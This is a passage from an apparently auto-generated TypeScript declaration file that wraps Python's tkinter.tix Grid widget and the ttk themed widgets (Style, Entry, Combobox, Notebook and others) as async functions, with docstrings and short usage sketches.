information\n\t\t * about Tix display items. 
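\n\t\t * \n\t\t * A population sketch via this bridge (treating the third argument of\n\t\t * set as the display item type is an assumption):\n\t\t * \n\t\t *     const g = await Grid(root)\n\t\t *     await g.set(0, 0, 'text')\n\t\t * \n\t\t * 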
Individual cells, or groups of cells, can be\n\t\t * formatted with a wide range of attributes, such as their color, relief and\n\t\t * border.\n\t\t * \n\t\t * Subwidgets - None\n\t\t */\n\t\tfunction Grid(master?, cnf?): Promise<IGrid>\n\t\tfunction Grid$({ master, cnf }: { master?, cnf?}): Promise<IGrid>\n\t\tinterface IGrid extends ITixWidget {\n\n\t\t\t/**\n\t\t\t * Removes the selection anchor.\n\t\t\t */\n\t\t\tanchor_clear(): Promise<any>\n\t\t\tanchor_clear$($: {}): Promise<any>\n\n\t\t\t/**\n\t\t\t * Get the (x,y) coordinate of the current anchor cell\n\t\t\t */\n\t\t\tanchor_get(): Promise<any>\n\t\t\tanchor_get$($: {}): Promise<any>\n\n\t\t\t/**\n\t\t\t * Set the selection anchor to the cell at (x, y).\n\t\t\t */\n\t\t\tanchor_set(x, y): Promise<any>\n\t\t\tanchor_set$({ x, y }): Promise<any>\n\n\t\t\t/**\n\t\t\t * Delete rows between from_ and to inclusive.\n\t\t\t * If to is not provided, delete only row at from_\n\t\t\t */\n\t\t\tdelete_row(from_, to?): Promise<any>\n\t\t\tdelete_row$({ from_, to }: { from_, to?}): Promise<any>\n\n\t\t\t/**\n\t\t\t * Delete columns between from_ and to inclusive.\n\t\t\t * If to is not provided, delete only column at from_\n\t\t\t */\n\t\t\tdelete_column(from_, to?): Promise<any>\n\t\t\tdelete_column$({ from_, to }: { from_, to?}): Promise<any>\n\n\t\t\t/**\n\t\t\t * If any cell is being edited, de-highlights the cell and applies\n\t\t\t * the changes.\n\t\t\t */\n\t\t\tedit_apply(): Promise<any>\n\t\t\tedit_apply$($: {}): Promise<any>\n\n\t\t\t/**\n\t\t\t * Highlights the cell at (x, y) for editing, if the -editnotify\n\t\t\t * command returns True for this cell.\n\t\t\t */\n\t\t\tedit_set(x, y): Promise<any>\n\t\t\tedit_set$({ x, y }): Promise<any>\n\n\t\t\t/**\n\t\t\t * Get the option value for cell at (x,y)\n\t\t\t */\n\t\t\tentrycget(x, y, option): Promise<any>\n\t\t\tentrycget$({ x, y, option }): Promise<any>\n\t\t\tentryconfigure(x, y, cnf?): Promise<any>\n\t\t\tentryconfigure$({ x, y, cnf }: { x, y, cnf?}): Promise<any>\n\n\t\t\t/**\n\t\t\t * Return True if display item exists at (x,y)\n\t\t\t */\n\t\t\tinfo_exists(x, y): Promise<any>\n\t\t\tinfo_exists$({ x, y }): Promise<any>\n\t\t\tinfo_bbox(x, y): Promise<any>\n\t\t\tinfo_bbox$({ x, y }): Promise<any>\n\n\t\t\t/**\n\t\t\t * Moves the range of columns from position FROM through TO by\n\t\t\t * the distance indicated by OFFSET. For example, move_column(2, 4, 1)\n\t\t\t * moves the columns 2,3,4 to columns 3,4,5.\n\t\t\t */\n\t\t\tmove_column(from_, to, offset): Promise<any>\n\t\t\tmove_column$({ from_, to, offset }): Promise<any>\n\n\t\t\t/**\n\t\t\t * Moves the range of rows from position FROM through TO by\n\t\t\t * the distance indicated by OFFSET.\n\t\t\t * For example, move_row(2, 4, 1) moves the rows 2,3,4 to rows 3,4,5.\n\t\t\t */\n\t\t\tmove_row(from_, to, offset): Promise<any>\n\t\t\tmove_row$({ from_, to, offset }): Promise<any>\n\n\t\t\t/**\n\t\t\t * Return coordinate of cell nearest pixel coordinate (x,y)\n\t\t\t */\n\t\t\tnearest(x, y): Promise<any>\n\t\t\tnearest$({ x, y }): Promise<any>\n\t\t\tset(x, y, itemtype?): Promise<any>\n\t\t\tset$({ x, y, itemtype }: { x, y, itemtype?}): Promise<any>\n\n\t\t\t/**\n\t\t\t * Queries or sets the size of the column given by\n\t\t\t * INDEX. 
INDEX may be any non-negative\n\t\t\t * integer that gives the position of a given column.\n\t\t\t * INDEX can also be the string \"default\"; in this case, this command\n\t\t\t * queries or sets the default size of all columns.\n\t\t\t * When no option-value pair is given, this command returns a tuple\n\t\t\t * containing the current size setting of the given column. When\n\t\t\t * option-value pairs are given, the corresponding options of the\n\t\t\t * size setting of the given column are changed. Options may be one\n\t\t\t * of the following:\n\t\t\t * pad0 pixels\n\t\t\t * Specifies the paddings to the left of a column.\n\t\t\t * pad1 pixels\n\t\t\t * Specifies the paddings to the right of a column.\n\t\t\t * size val\n\t\t\t * Specifies the width of a column. Val may be:\n\t\t\t * \"auto\" -- the width of the column is set to the\n\t\t\t * width of the widest cell in the column;\n\t\t\t * a valid Tk screen distance unit;\n\t\t\t * or a real number followed by the word chars\n\t\t\t * (e.g. 3.4chars) that sets the width of the column to the\n\t\t\t * given number of characters.\n\t\t\t */\n\t\t\tsize_column(index): Promise<any>\n\t\t\tsize_column$({ index }): Promise<any>\n\n\t\t\t/**\n\t\t\t * Queries or sets the size of the row given by\n\t\t\t * INDEX. INDEX may be any non-negative\n\t\t\t * integer that gives the position of a given row.\n\t\t\t * INDEX can also be the string \"default\"; in this case, this command\n\t\t\t * queries or sets the default size of all rows.\n\t\t\t * When no option-value pair is given, this command returns a list\n\t\t\t * containing the current size setting of the given row. When option-value\n\t\t\t * pairs are given, the corresponding options of the size setting of the\n\t\t\t * given row are changed. Options may be one of the following:\n\t\t\t * pad0 pixels\n\t\t\t * Specifies the paddings to the top of a row.\n\t\t\t * pad1 pixels\n\t\t\t * Specifies the paddings to the bottom of a row.\n\t\t\t * size val\n\t\t\t * Specifies the height of a row. Val may be:\n\t\t\t * \"auto\" -- the height of the row is set to the\n\t\t\t * height of the highest cell in the row;\n\t\t\t * a valid Tk screen distance unit;\n\t\t\t * or a real number followed by the word chars\n\t\t\t * (e.g. 
3.4chars) that sets the height of the row to the\n\t\t\t * given number of characters.\n\t\t\t */\n\t\t\tsize_row(index): Promise<any>\n\t\t\tsize_row$({ index }): Promise<any>\n\n\t\t\t/**\n\t\t\t * Clears the cell at (x, y) by removing its display item.\n\t\t\t */\n\t\t\tunset(x, y): Promise<any>\n\t\t\tunset$({ x, y }): Promise<any>\n\t\t}\n\n\t\t/**\n\t\t * Scrolled Grid widgets\n\t\t */\n\t\tfunction ScrolledGrid(master?, cnf?): Promise<IScrolledGrid>\n\t\tfunction ScrolledGrid$({ master, cnf }: { master?, cnf?}): Promise<IScrolledGrid>\n\t\tinterface IScrolledGrid extends IGrid {\n\t\t}\n\t\tlet WINDOW: Promise<any>\n\t\tlet TEXT: Promise<any>\n\t\tlet STATUS: Promise<any>\n\t\tlet IMMEDIATE: Promise<any>\n\t\tlet IMAGE: Promise<any>\n\t\tlet IMAGETEXT: Promise<any>\n\t\tlet BALLOON: Promise<any>\n\t\tlet AUTO: Promise<any>\n\t\tlet ACROSSTOP: Promise<any>\n\t\tlet ASCII: Promise<any>\n\t\tlet CELL: Promise<any>\n\t\tlet COLUMN: Promise<any>\n\t\tlet DECREASING: Promise<any>\n\t\tlet INCREASING: Promise<any>\n\t\tlet INTEGER: Promise<any>\n\t\tlet MAIN: Promise<any>\n\t\tlet MAX: Promise<any>\n\t\tlet REAL: Promise<any>\n\t\tlet ROW: Promise<any>\n\t\tlet S_REGION: Promise<any>\n\t\tlet X_REGION: Promise<any>\n\t\tlet Y_REGION: Promise<any>\n\t\tlet TCL_DONT_WAIT: Promise<any>\n\t\tlet TCL_WINDOW_EVENTS: Promise<any>\n\t\tlet TCL_FILE_EVENTS: Promise<any>\n\t\tlet TCL_TIMER_EVENTS: Promise<any>\n\t\tlet TCL_IDLE_EVENTS: Promise<any>\n\t\tlet TCL_ALL_EVENTS: Promise<any>\n\t}\n\tmodule ttk {\n\t\tvar _\n\n\t\t/**\n\t\t * Returns adict with its values converted from Tcl objects to Python\n\t\t * objects.\n\t\t */\n\t\tfunction tclobjs_to_py(adict): Promise<any>\n\t\tfunction tclobjs_to_py$({ adict }): Promise<any>\n\n\t\t/**\n\t\t * If master is not None, master itself is returned. If master is None,\n\t\t * the default master is returned if there is one, otherwise a new\n\t\t * master is created and returned.\n\t\t * \n\t\t * If it is not allowed to use the default root and master is None,\n\t\t * RuntimeError is raised.\n\t\t */\n\t\tfunction setup_master(master?): Promise<any>\n\t\tfunction setup_master$({ master }: { master?}): Promise<any>\n\n\t\t/**\n\t\t * Manipulate style database.\n\t\t */\n\t\tfunction Style(master?): Promise<IStyle>\n\t\tfunction Style$({ master }: { master?}): Promise<IStyle>\n\t\tinterface IStyle {\n\n\t\t\t/**\n\t\t\t * Query or set the default value of the specified option(s) in\n\t\t\t * style.\n\t\t\t * \n\t\t\t * Each key in kw is an option and each value is either a string or\n\t\t\t * a sequence identifying the value for that option.\n\t\t\t */\n\t\t\tconfigure(style, query_opt?): Promise<any>\n\t\t\tconfigure$({ style, query_opt }: { style, query_opt?}): Promise<any>\n\n\t\t\t/**\n\t\t\t * Query or set dynamic values of the specified option(s) in\n\t\t\t * style.\n\t\t\t * \n\t\t\t * Each key in kw is an option and each value should be a list or a\n\t\t\t * tuple (usually) containing statespecs grouped in tuples, or list,\n\t\t\t * or something else of your preference. A statespec is composed of\n\t\t\t * one or more states and then a value.\n\t\t\t */\n\t\t\tmap(style, query_opt?): Promise<any>\n\t\t\tmap$({ style, query_opt }: { style, query_opt?}): Promise<any>\n\n\t\t\t/**\n\t\t\t * Returns the value specified for option in style.\n\t\t\t * \n\t\t\t * If state is specified it is expected to be a sequence of one\n\t\t\t * or more states. 
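\n\t\t\t * \n\t\t\t * A sketch via this bridge (the style handle from Style() above is\n\t\t\t * assumed):\n\t\t\t * \n\t\t\t *     const font = await style.lookup('TButton', 'font')\n\t\t\t * \n\t\t\t * 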
If the default argument is set, it is used as\n\t\t\t * a fallback value in case no specification for option is found.\n\t\t\t */\n\t\t\tlookup(style, option, state?, def?): Promise<any>\n\t\t\tlookup$({ style, option, state, def }: { style, option, state?, def?}): Promise<any>\n\n\t\t\t/**\n\t\t\t * Define the widget layout for given style. If layoutspec is\n\t\t\t * omitted, return the layout specification for given style.\n\t\t\t * \n\t\t\t * layoutspec is expected to be a list or an object different than\n\t\t\t * None that evaluates to False if you want to \"turn off\" that style.\n\t\t\t * If it is a list (or tuple, or something else), each item should be\n\t\t\t * a tuple where the first item is the layout name and the second item\n\t\t\t * should have the format described below:\n\t\t\t * \n\t\t\t * LAYOUTS\n\t\t\t * \n\t\t\t * A layout can contain the value None, if it takes no options, or\n\t\t\t * a dict of options specifying how to arrange the element.\n\t\t\t * The layout mechanism uses a simplified version of the pack\n\t\t\t * geometry manager: given an initial cavity, each element is\n\t\t\t * allocated a parcel. Valid options/values are:\n\t\t\t * \n\t\t\t * side: whichside\n\t\t\t * Specifies which side of the cavity to place the\n\t\t\t * element; one of top, right, bottom or left. If\n\t\t\t * omitted, the element occupies the entire cavity.\n\t\t\t * \n\t\t\t * sticky: nswe\n\t\t\t * Specifies where the element is placed inside its\n\t\t\t * allocated parcel.\n\t\t\t * \n\t\t\t * children: [sublayout... ]\n\t\t\t * Specifies a list of elements to place inside the\n\t\t\t * element. Each element is a tuple (or other sequence)\n\t\t\t * where the first item is the layout name, and the other\n\t\t\t * is a LAYOUT.\n\t\t\t */\n\t\t\tlayout(style, layoutspec?): Promise<any>\n\t\t\tlayout$({ style, layoutspec }: { style, layoutspec?}): Promise<any>\n\n\t\t\t/**\n\t\t\t * Create a new element in the current theme of given etype.\n\t\t\t */\n\t\t\telement_create(elementname, etype): Promise<any>\n\t\t\telement_create$({ elementname, etype }): Promise<any>\n\n\t\t\t/**\n\t\t\t * Returns the list of elements defined in the current theme.\n\t\t\t */\n\t\t\telement_names(): Promise<any>\n\t\t\telement_names$($: {}): Promise<any>\n\n\t\t\t/**\n\t\t\t * Return the list of elementname's options.\n\t\t\t */\n\t\t\telement_options(elementname): Promise<any>\n\t\t\telement_options$({ elementname }): Promise<any>\n\n\t\t\t/**\n\t\t\t * Creates a new theme.\n\t\t\t * \n\t\t\t * It is an error if themename already exists. If parent is\n\t\t\t * specified, the new theme will inherit styles, elements and\n\t\t\t * layouts from the specified parent theme. 
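\n\t\t\t * \n\t\t\t * A sketch via this bridge (the theme name is hypothetical):\n\t\t\t * \n\t\t\t *     await style.theme_create('myTheme', 'clam')\n\t\t\t * \n\t\t\t * 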
If settings are present,\n\t\t\t * they are expected to have the same syntax used for theme_settings.\n\t\t\t */\n\t\t\ttheme_create(themename, parent?, settings?): Promise<any>\n\t\t\ttheme_create$({ themename, parent, settings }: { themename, parent?, settings?}): Promise<any>\n\n\t\t\t/**\n\t\t\t * Temporarily sets the current theme to themename, applies the specified\n\t\t\t * settings and then restores the previous theme.\n\t\t\t * \n\t\t\t * Each key in settings is a style and each value may contain the\n\t\t\t * keys 'configure', 'map', 'layout' and 'element create' and they\n\t\t\t * are expected to have the same format as specified by the methods\n\t\t\t * configure, map, layout and element_create respectively.\n\t\t\t */\n\t\t\ttheme_settings(themename, settings): Promise<any>\n\t\t\ttheme_settings$({ themename, settings }): Promise<any>\n\n\t\t\t/**\n\t\t\t * Returns a list of all known themes.\n\t\t\t */\n\t\t\ttheme_names(): Promise<any>\n\t\t\ttheme_names$($: {}): Promise<any>\n\n\t\t\t/**\n\t\t\t * If themename is None, returns the theme in use, otherwise, sets\n\t\t\t * the current theme to themename, refreshes all widgets and emits\n\t\t\t * a <<ThemeChanged>> event.\n\t\t\t */\n\t\t\ttheme_use(themename?): Promise<any>\n\t\t\ttheme_use$({ themename }: { themename?}): Promise<any>\n\t\t}\n\n\t\t/**\n\t\t * Base class for Tk themed widgets.\n\t\t */\n\n\t\t/**\n\t\t * Constructs a Ttk Widget with the parent master.\n\t\t * \n\t\t * STANDARD OPTIONS\n\t\t * \n\t\t * class, cursor, takefocus, style\n\t\t * \n\t\t * SCROLLABLE WIDGET OPTIONS\n\t\t * \n\t\t * xscrollcommand, yscrollcommand\n\t\t * \n\t\t * LABEL WIDGET OPTIONS\n\t\t * \n\t\t * text, textvariable, underline, image, compound, width\n\t\t * \n\t\t * WIDGET STATES\n\t\t * \n\t\t * active, disabled, focus, pressed, selected, background,\n\t\t * readonly, alternate, invalid\n\t\t * \n\t\t */\n\t\tfunction Widget(master, widgetname, kw?): Promise<IWidget>\n\t\tfunction Widget$({ master, widgetname, kw }: { master, widgetname, kw?}): Promise<IWidget>\n\t\tinterface IWidget {\n\n\t\t\t/**\n\t\t\t * Returns the name of the element at position x, y, or the empty\n\t\t\t * string if the point does not lie within any element.\n\t\t\t * \n\t\t\t * x and y are pixel coordinates relative to the widget.\n\t\t\t */\n\t\t\tidentify(x, y): Promise<any>\n\t\t\tidentify$({ x, y }): Promise<any>\n\n\t\t\t/**\n\t\t\t * Test the widget's state.\n\t\t\t * \n\t\t\t * If callback is not specified, returns True if the widget state\n\t\t\t * matches statespec and False otherwise. If callback is specified,\n\t\t\t * then it will be invoked with *args, **kw if the widget state\n\t\t\t * matches statespec. statespec is expected to be a sequence.\n\t\t\t */\n\t\t\tinstate(statespec, callback?): Promise<any>\n\t\t\tinstate$({ statespec, callback }: { statespec, callback?}): Promise<any>\n\n\t\t\t/**\n\t\t\t * Modify or inquire widget state.\n\t\t\t * \n\t\t\t * Widget state is returned if statespec is None, otherwise it is\n\t\t\t * set according to the statespec flags and then a new state spec\n\t\t\t * is returned indicating which flags were changed. 
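For\n\t\t\t * example (a sketch; the widget handle w is hypothetical):\n\t\t\t * await w.state(['disabled']) sets the disabled flag and returns a\n\t\t\t * spec such as ['!disabled'] that would restore the previous state. 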
statespec is\n\t\t\t * expected to be a sequence.\n\t\t\t */\n\t\t\tstate(statespec?): Promise<any>\n\t\t\tstate$({ statespec }: { statespec?}): Promise<any>\n\t\t}\n\n\t\t/**\n\t\t * Ttk Button widget, displays a textual label and/or image, and\n\t\t * evaluates a command when pressed.\n\t\t */\n\n\t\t/**\n\t\t * Construct a Ttk Button widget with the parent master.\n\t\t * \n\t\t * STANDARD OPTIONS\n\t\t * \n\t\t * class, compound, cursor, image, state, style, takefocus,\n\t\t * text, textvariable, underline, width\n\t\t * \n\t\t * WIDGET-SPECIFIC OPTIONS\n\t\t * \n\t\t * command, default, width\n\t\t * \n\t\t */\n\t\tfunction Button(master?): Promise<IButton>\n\t\tfunction Button$({ master }: { master?}): Promise<IButton>\n\t\tinterface IButton extends IWidget {\n\n\t\t\t/**\n\t\t\t * Invokes the command associated with the button.\n\t\t\t */\n\t\t\tinvoke(): Promise<any>\n\t\t\tinvoke$($: {}): Promise<any>\n\t\t}\n\n\t\t/**\n\t\t * Ttk Checkbutton widget which is either in on- or off-state.\n\t\t */\n\n\t\t/**\n\t\t * Construct a Ttk Checkbutton widget with the parent master.\n\t\t * \n\t\t * STANDARD OPTIONS\n\t\t * \n\t\t * class, compound, cursor, image, state, style, takefocus,\n\t\t * text, textvariable, underline, width\n\t\t * \n\t\t * WIDGET-SPECIFIC OPTIONS\n\t\t * \n\t\t * command, offvalue, onvalue, variable\n\t\t * \n\t\t */\n\t\tfunction Checkbutton(master?): Promise<ICheckbutton>\n\t\tfunction Checkbutton$({ master }: { master?}): Promise<ICheckbutton>\n\t\tinterface ICheckbutton extends IWidget {\n\n\t\t\t/**\n\t\t\t * Toggles between the selected and deselected states and\n\t\t\t * invokes the associated command. If the widget is currently\n\t\t\t * selected, sets the option variable to the offvalue option\n\t\t\t * and deselects the widget; otherwise, sets the option variable\n\t\t\t * to the option onvalue.\n\t\t\t * \n\t\t\t * Returns the result of the associated command.\n\t\t\t */\n\t\t\tinvoke(): Promise<any>\n\t\t\tinvoke$($: {}): Promise<any>\n\t\t}\n\n\t\t/**\n\t\t * Ttk Entry widget displays a one-line text string and allows that\n\t\t * string to be edited by the user.\n\t\t */\n\n\t\t/**\n\t\t * Constructs a Ttk Entry widget with the parent master.\n\t\t * \n\t\t * STANDARD OPTIONS\n\t\t * \n\t\t * class, cursor, style, takefocus, xscrollcommand\n\t\t * \n\t\t * WIDGET-SPECIFIC OPTIONS\n\t\t * \n\t\t * exportselection, invalidcommand, justify, show, state,\n\t\t * textvariable, validate, validatecommand, width\n\t\t * \n\t\t * VALIDATION MODES\n\t\t * \n\t\t * none, key, focus, focusin, focusout, all\n\t\t * \n\t\t */\n\t\tfunction Entry(master?, widget?): Promise<IEntry>\n\t\tfunction Entry$({ master, widget }: { master?, widget?}): Promise<IEntry>\n\t\tinterface IEntry extends IWidget {\n\n\t\t\t/**\n\t\t\t * Return a tuple of (x, y, width, height) which describes the\n\t\t\t * bounding box of the character given by index.\n\t\t\t */\n\t\t\tbbox(index): Promise<any>\n\t\t\tbbox$({ index }): Promise<any>\n\n\t\t\t/**\n\t\t\t * Returns the name of the element at position x, y, or the\n\t\t\t * empty string if the coordinates are outside the window.\n\t\t\t */\n\t\t\tidentify(x, y): Promise<any>\n\t\t\tidentify$({ x, y }): Promise<any>\n\n\t\t\t/**\n\t\t\t * Force revalidation, independent of the conditions specified\n\t\t\t * by the validate option. Returns False if validation fails, True\n\t\t\t * if it succeeds. 
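(A sketch via this\n\t\t\t * bridge: const ok = await entry.validate().) 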
Sets or clears the invalid state accordingly.\n\t\t\t */\n\t\t\tvalidate(): Promise<any>\n\t\t\tvalidate$($: {}): Promise<any>\n\t\t}\n\n\t\t/**\n\t\t * Ttk Combobox widget combines a text field with a pop-down list of\n\t\t * values.\n\t\t */\n\n\t\t/**\n\t\t * Construct a Ttk Combobox widget with the parent master.\n\t\t * \n\t\t * STANDARD OPTIONS\n\t\t * \n\t\t * class, cursor, style, takefocus\n\t\t * \n\t\t * WIDGET-SPECIFIC OPTIONS\n\t\t * \n\t\t * exportselection, justify, height, postcommand, state,\n\t\t * textvariable, values, width\n\t\t * \n\t\t */\n\t\tfunction Combobox(master?): Promise<ICombobox>\n\t\tfunction Combobox$({ master }: { master?}): Promise<ICombobox>\n\t\tinterface ICombobox extends IEntry {\n\n\t\t\t/**\n\t\t\t * If newindex is supplied, sets the combobox value to the\n\t\t\t * element at position newindex in the list of values. Otherwise,\n\t\t\t * returns the index of the current value in the list of values\n\t\t\t * or -1 if the current value does not appear in the list.\n\t\t\t */\n\t\t\tcurrent(newindex?): Promise<any>\n\t\t\tcurrent$({ newindex }: { newindex?}): Promise<any>\n\n\t\t\t/**\n\t\t\t * Sets the value of the combobox to value.\n\t\t\t */\n\t\t\tset(value): Promise<any>\n\t\t\tset$({ value }): Promise<any>\n\t\t}\n\n\t\t/**\n\t\t * Ttk Frame widget is a container, used to group other widgets\n\t\t * together.\n\t\t */\n\n\t\t/**\n\t\t * Construct a Ttk Frame with parent master.\n\t\t * \n\t\t * STANDARD OPTIONS\n\t\t * \n\t\t * class, cursor, style, takefocus\n\t\t * \n\t\t * WIDGET-SPECIFIC OPTIONS\n\t\t * \n\t\t * borderwidth, relief, padding, width, height\n\t\t * \n\t\t */\n\t\tfunction Frame(master?): Promise<IFrame>\n\t\tfunction Frame$({ master }: { master?}): Promise<IFrame>\n\t\tinterface IFrame extends IWidget {\n\t\t}\n\n\t\t/**\n\t\t * Ttk Label widget displays a textual label and/or image.\n\t\t */\n\n\t\t/**\n\t\t * Construct a Ttk Label with parent master.\n\t\t * \n\t\t * STANDARD OPTIONS\n\t\t * \n\t\t * class, compound, cursor, image, style, takefocus, text,\n\t\t * textvariable, underline, width\n\t\t * \n\t\t * WIDGET-SPECIFIC OPTIONS\n\t\t * \n\t\t * anchor, background, font, foreground, justify, padding,\n\t\t * relief, text, wraplength\n\t\t * \n\t\t */\n\t\tfunction Label(master?): Promise<ILabel>\n\t\tfunction Label$({ master }: { master?}): Promise<ILabel>\n\t\tinterface ILabel extends IWidget {\n\t\t}\n\n\t\t/**\n\t\t * Ttk Labelframe widget is a container used to group other widgets\n\t\t * together. 
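/* Sketch: the Combobox selection flow described above (same assumptions as
 * the Style sketch; `get()` is inherited from the underlying Tk entry and is
 * not listed in these stubs).
 *
 *   const combo = await ttk.Combobox$({ master: root, values: ['red', 'green', 'blue'] })
 *   await combo.current(0)              // select the first list element
 *   console.log(await combo.get())      // 'red'
 *   console.log(await combo.current())  // 0
 */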
It has an optional label, which may be a plain text string\n\t\t * or another widget.\n\t\t */\n\n\t\t/**\n\t\t * Construct a Ttk Labelframe with parent master.\n\t\t * \n\t\t * STANDARD OPTIONS\n\t\t * \n\t\t * class, cursor, style, takefocus\n\t\t * \n\t\t * WIDGET-SPECIFIC OPTIONS\n\t\t * labelanchor, text, underline, padding, labelwidget, width,\n\t\t * height\n\t\t * \n\t\t */\n\t\tfunction Labelframe(master?): Promise<ILabelframe>\n\t\tfunction Labelframe$({ master }: { master?}): Promise<ILabelframe>\n\t\tinterface ILabelframe extends IWidget {\n\t\t}\n\n\t\t/**\n\t\t * Ttk Menubutton widget displays a textual label and/or image, and\n\t\t * displays a menu when pressed.\n\t\t */\n\n\t\t/**\n\t\t * Construct a Ttk Menubutton with parent master.\n\t\t * \n\t\t * STANDARD OPTIONS\n\t\t * \n\t\t * class, compound, cursor, image, state, style, takefocus,\n\t\t * text, textvariable, underline, width\n\t\t * \n\t\t * WIDGET-SPECIFIC OPTIONS\n\t\t * \n\t\t * direction, menu\n\t\t * \n\t\t */\n\t\tfunction Menubutton(master?): Promise<IMenubutton>\n\t\tfunction Menubutton$({ master }: { master?}): Promise<IMenubutton>\n\t\tinterface IMenubutton extends IWidget {\n\t\t}\n\n\t\t/**\n\t\t * Ttk Notebook widget manages a collection of windows and displays\n\t\t * a single one at a time. Each child window is associated with a tab,\n\t\t * which the user may select to change the currently-displayed window.\n\t\t */\n\n\t\t/**\n\t\t * Construct a Ttk Notebook with parent master.\n\t\t * \n\t\t * STANDARD OPTIONS\n\t\t * \n\t\t * class, cursor, style, takefocus\n\t\t * \n\t\t * WIDGET-SPECIFIC OPTIONS\n\t\t * \n\t\t * height, padding, width\n\t\t * \n\t\t * TAB OPTIONS\n\t\t * \n\t\t * state, sticky, padding, text, image, compound, underline\n\t\t * \n\t\t * TAB IDENTIFIERS (tab_id)\n\t\t * \n\t\t * The tab_id argument found in several methods may take any of\n\t\t * the following forms:\n\t\t * \n\t\t * * An integer between zero and the number of tabs\n\t\t * * The name of a child window\n\t\t * * A positional specification of the form \"@x,y\", which\n\t\t * defines the tab\n\t\t * * The string \"current\", which identifies the\n\t\t * currently-selected tab\n\t\t * * The string \"end\", which returns the number of tabs (only\n\t\t * valid for method index)\n\t\t * \n\t\t */\n\t\tfunction Notebook(master?): Promise<INotebook>\n\t\tfunction Notebook$({ master }: { master?}): Promise<INotebook>\n\t\tinterface INotebook extends IWidget {\n\n\t\t\t/**\n\t\t\t * Adds a new tab to the notebook.\n\t\t\t * \n\t\t\t * If window is currently managed by the notebook but hidden, it is\n\t\t\t * restored to its previous position.\n\t\t\t */\n\t\t\tadd(child): Promise<any>\n\t\t\tadd$({ child }): Promise<any>\n\n\t\t\t/**\n\t\t\t * Removes the tab specified by tab_id, unmaps and unmanages the\n\t\t\t * associated window.\n\t\t\t */\n\t\t\tforget(tab_id): Promise<any>\n\t\t\tforget$({ tab_id }): Promise<any>\n\n\t\t\t/**\n\t\t\t * Hides the tab specified by tab_id.\n\t\t\t * \n\t\t\t * The tab will not be displayed, but the associated window remains\n\t\t\t * managed by the notebook and its configuration remembered. 
Hidden\n\t\t\t * tabs may be restored with the add command.\n\t\t\t */\n\t\t\thide(tab_id): Promise<any>\n\t\t\thide$({ tab_id }): Promise<any>\n\n\t\t\t/**\n\t\t\t * Returns the name of the tab element at position x, y, or the\n\t\t\t * empty string if none.\n\t\t\t */\n\t\t\tidentify(x, y): Promise<any>\n\t\t\tidentify$({ x, y }): Promise<any>\n\n\t\t\t/**\n\t\t\t * Returns the numeric index of the tab specified by tab_id, or\n\t\t\t * the total number of tabs if tab_id is the string \"end\".\n\t\t\t */\n\t\t\tindex(tab_id): Promise<any>\n\t\t\tindex$({ tab_id }): Promise<any>\n\n\t\t\t/**\n\t\t\t * Inserts a pane at the specified position.\n\t\t\t * \n\t\t\t * pos is either the string end, an integer index, or the name of\n\t\t\t * a managed child. If child is already managed by the notebook,\n\t\t\t * moves it to the specified position.\n\t\t\t */\n\t\t\tinsert(pos, child): Promise<any>\n\t\t\tinsert$({ pos, child }): Promise<any>\n\n\t\t\t/**\n\t\t\t * Selects the specified tab.\n\t\t\t * \n\t\t\t * The associated child window will be displayed, and the\n\t\t\t * previously-selected window (if different) is unmapped. If tab_id\n\t\t\t * is omitted, returns the widget name of the currently selected\n\t\t\t * pane.\n\t\t\t */\n\t\t\tselect(tab_id?): Promise<any>\n\t\t\tselect$({ tab_id }: { tab_id?}): Promise<any>\n\n\t\t\t/**\n\t\t\t * Query or modify the options of the specific tab_id.\n\t\t\t * \n\t\t\t * If kw is not given, returns a dict of the tab option values. If option\n\t\t\t * is specified, returns the value of that option. Otherwise, sets the\n\t\t\t * options to the corresponding values.\n\t\t\t */\n\t\t\ttab(tab_id, option?): Promise<any>\n\t\t\ttab$({ tab_id, option }: { tab_id, option?}): Promise<any>\n\n\t\t\t/**\n\t\t\t * Returns a list of windows managed by the notebook.\n\t\t\t */\n\t\t\ttabs(): Promise<any>\n\t\t\ttabs$($: {}): Promise<any>\n\n\t\t\t/**\n\t\t\t * Enable keyboard traversal for a toplevel window containing\n\t\t\t * this notebook.\n\t\t\t * \n\t\t\t * This will extend the bindings for the toplevel window containing\n\t\t\t * this notebook as follows:\n\t\t\t * \n\t\t\t * Control-Tab: selects the tab following the currently selected\n\t\t\t * one\n\t\t\t * \n\t\t\t * Shift-Control-Tab: selects the tab preceding the currently\n\t\t\t * selected one\n\t\t\t * \n\t\t\t * Alt-K: where K is the mnemonic (underlined) character of any\n\t\t\t * tab, will select that tab.\n\t\t\t * \n\t\t\t * Multiple notebooks in a single toplevel may be enabled for\n\t\t\t * traversal, including nested notebooks. 
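/* Sketch: tab management with the Notebook methods above, using only the
 * positional call forms from these stubs (same assumptions as earlier).
 *
 *   const nb = await ttk.Notebook(root)
 *   const page = await ttk.Frame(nb)
 *   await nb.add(page)
 *   console.log(await nb.index('end'))  // 1 -- "end" yields the tab count
 *   await nb.select(0)
 *   console.log(await nb.tabs())        // window paths of the managed children
 */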
However, notebook traversal\n\t\t\t * only works properly if all panes are direct children of the\n\t\t\t * notebook.\n\t\t\t */\n\t\t\tenable_traversal(): Promise<any>\n\t\t\tenable_traversal$($: {}): Promise<any>\n\t\t}\n\n\t\t/**\n\t\t * Ttk Panedwindow widget displays a number of subwindows, stacked\n\t\t * either vertically or horizontally.\n\t\t */\n\n\t\t/**\n\t\t * Construct a Ttk Panedwindow with parent master.\n\t\t * \n\t\t * STANDARD OPTIONS\n\t\t * \n\t\t * class, cursor, style, takefocus\n\t\t * \n\t\t * WIDGET-SPECIFIC OPTIONS\n\t\t * \n\t\t * orient, width, height\n\t\t * \n\t\t * PANE OPTIONS\n\t\t * \n\t\t * weight\n\t\t * \n\t\t */\n\t\tfunction Panedwindow(master?): Promise<IPanedwindow>\n\t\tfunction Panedwindow$({ master }: { master?}): Promise<IPanedwindow>\n\t\tinterface IPanedwindow extends IWidget {\n\n\t\t\t/**\n\t\t\t * Inserts a pane at the specified position.\n\t\t\t * \n\t\t\t * pos is either the string end, an integer index, or the name\n\t\t\t * of a child. If child is already managed by the paned window,\n\t\t\t * moves it to the specified position.\n\t\t\t */\n\t\t\tinsert(pos, child): Promise<any>\n\t\t\tinsert$({ pos, child }): Promise<any>\n\n\t\t\t/**\n\t\t\t * Query or modify the options of the specified pane.\n\t\t\t * \n\t\t\t * pane is either an integer index or the name of a managed subwindow.\n\t\t\t * If kw is not given, returns a dict of the pane option values. If\n\t\t\t * option is specified then the value for that option is returned.\n\t\t\t * Otherwise, sets the options to the corresponding values.\n\t\t\t */\n\t\t\tpane(pane, option?): 